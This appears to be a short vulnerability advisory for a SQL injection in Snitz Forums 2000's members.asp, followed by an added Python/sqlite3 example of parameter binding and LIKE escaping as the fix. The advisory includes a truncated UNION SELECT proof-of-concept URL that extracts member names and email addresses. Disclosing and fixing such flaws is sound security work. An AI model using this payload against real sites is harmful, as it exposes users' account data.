Snitz Forums 2000 Members.ASP SQL Injection Vulnerability
This may be exploited with a web browser. The following proof-of-concept was provided:

Normally, to view the list of members whose member name starts with 'A', the members.asp page is used as follows:

/members.asp?mode=search&M_NAME=A&initial=1&method=

Use this link to view the vulnerability:

/members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
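
Added example, not part of the original advisory and not Snitz Forums code: a Python/sqlite3 illustration of the defensive pattern for a member-name search such as the one behind M_NAME, binding the value as a query parameter and escaping LIKE wildcards so that input like the proof-of-concept above is matched as literal text. The table name members, the sample rows and the function names are assumptions; the column names are the ones visible in the proof-of-concept.

```python
import sqlite3
from urllib.parse import unquote

# Visible (truncated) part of the M_NAME value from the advisory, as sent in the URL.
ADVISORY_M_NAME = ("XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,"
                   "%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,")
# What the application receives after URL decoding.
ADVISORY_DECODED = unquote(ADVISORY_M_NAME)


def make_db():
    """Constructed sample data; the table name 'members' is hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (MEMBER_ID INTEGER PRIMARY KEY,"
               " M_STATUS INTEGER, M_NAME TEXT, M_EMAIL TEXT, M_LEVEL INTEGER)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?, ?, ?)", [
        (1, 1, "Alice", "alice@example.test", 1),
        (2, 1, "Adam", "adam@example.test", 1),
        (3, 1, "Bob", "bob@example.test", 3),
        (4, 1, "100%_sure", "pct@example.test", 1),
    ])
    return db


def escape_like(term, esc="\\"):
    """Escape LIKE wildcards (and the escape character) so input matches literally."""
    for ch in (esc, "%", "_"):
        term = term.replace(ch, esc + ch)
    return term


def search_members(db, m_name):
    """Prefix search on M_NAME; the value is bound, never concatenated into SQL."""
    sql = ("SELECT MEMBER_ID, M_NAME FROM members "
           "WHERE M_NAME LIKE ? ESCAPE '\\' ORDER BY M_NAME")
    return db.execute(sql, (escape_like(m_name) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(search_members(db, "A"))               # normal search by initial
    print(search_members(db, ADVISORY_DECODED))  # advisory input, treated as a name
```

Because the quote, parenthesis and UNION keyword arrive as data in a bound parameter, they cannot close the string literal or extend the statement, and the escaped % keeps the search from matching every row.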